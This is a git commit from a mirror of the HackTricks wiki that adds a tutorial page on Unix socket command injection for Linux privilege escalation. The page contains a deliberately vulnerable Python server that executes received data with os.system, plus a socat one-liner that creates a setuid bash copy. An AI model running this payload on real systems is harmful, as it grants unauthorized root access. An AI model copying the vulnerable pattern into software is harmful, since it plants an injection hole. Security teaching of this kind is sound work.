mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
GitBook: [master] 3 pages modified
This commit is contained in:
parent
b4e619098f
commit
66148028ec
3 changed files with 63 additions and 1 deletions
|
@ -22,11 +22,12 @@
|
|||
* [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
|
||||
* [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md)
|
||||
* [D-Bus Enumeration & Command Injection Privilege Escalation](linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md)
|
||||
* [Escaping from restricted shells - Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md)
|
||||
* [Interesting Groups - Linux PE](linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md)
|
||||
* [lxd/lxc Group - Privilege escalation](linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md)
|
||||
* [NFS no\_root\_squash/no\_all\_squash misconfiguration PE](linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md)
|
||||
* [Escaping from restricted shells - Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md)
|
||||
* [SSH Forward Agent exploitation](linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md)
|
||||
* [Socket Command Injection](linux-unix/privilege-escalation/socket-command-injection.md)
|
||||
* [Payloads to execute](linux-unix/privilege-escalation/payloads-to-execute.md)
|
||||
* [Wildcards Spare tricks](linux-unix/privilege-escalation/wildcards-spare-tricks.md)
|
||||
* [Useful Linux Commands](linux-unix/useful-linux-commands/README.md)
|
||||
|
|
|
@ -438,6 +438,21 @@ If you **identify any writable socket** \(_now where are talking about Unix Sock
|
|||
netstat -a -p --unix
|
||||
```
|
||||
|
||||
### Raw connection
|
||||
|
||||
```bash
|
||||
#apt-get install netcat-openbsd
|
||||
nc -U /tmp/socket #Connect to UNIX-domain stream socket
|
||||
nc -uU /tmp/socket #Connect to UNIX-domain datagram socket
|
||||
|
||||
#apt-get install socat
|
||||
socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type
|
||||
```
|
||||
|
||||
**Exploitation example:**
|
||||
|
||||
{% page-ref page="socket-command-injection.md" %}
|
||||
|
||||
### HTTP sockets
|
||||
|
||||
Note that there may be some **sockets listening for HTTP** requests \(_I'm not talking about .socket files but about the files acting as unix sockets_\). You can check this with:
|
||||
|
|
46
linux-unix/privilege-escalation/socket-command-injection.md
Normal file
46
linux-unix/privilege-escalation/socket-command-injection.md
Normal file
|
@ -0,0 +1,46 @@
|
|||
# Socket Command Injection
|
||||
|
||||
### Socket binding example with Python
|
||||
|
||||
In the following example a **unix socket is created** \(`/tmp/socket_test.s`\) and everything **received** is going to be **executed** by `os.system`.I know that you aren't going to find this in the wild, but the goal of this example is to see how a code using unix sockets looks like, and how to manage the input in the worst case possible.
|
||||
|
||||
{% code title="s.py" %}
|
||||
```python
|
||||
import socket
|
||||
import os, os.path
|
||||
import time
|
||||
from collections import deque
|
||||
|
||||
if os.path.exists("/tmp/socket_test.s"):
|
||||
os.remove("/tmp/socket_test.s")
|
||||
|
||||
server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
|
||||
server.bind("/tmp/socket_test.s")
|
||||
while True:
|
||||
server.listen(1)
|
||||
conn, addr = server.accept()
|
||||
datagram = conn.recv(1024)
|
||||
if datagram:
|
||||
print(datagram)
|
||||
os.system(datagram)
|
||||
conn.close()
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
**Execute** the code using python: `python s.py` and **check how the socket is listening**:
|
||||
|
||||
```python
|
||||
netstat -a -p --unix | grep "socket_test"
|
||||
(Not all processes could be identified, non-owned process info
|
||||
will not be shown, you would have to be root to see it all.)
|
||||
unix 2 [ ACC ] STREAM LISTENING 901181 132748/python /tmp/socket_test.s
|
||||
```
|
||||
|
||||
**Exploit**
|
||||
|
||||
```python
|
||||
echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s
|
||||
```
|
||||
|
||||
|
||||
|
Loading…
Reference in a new issue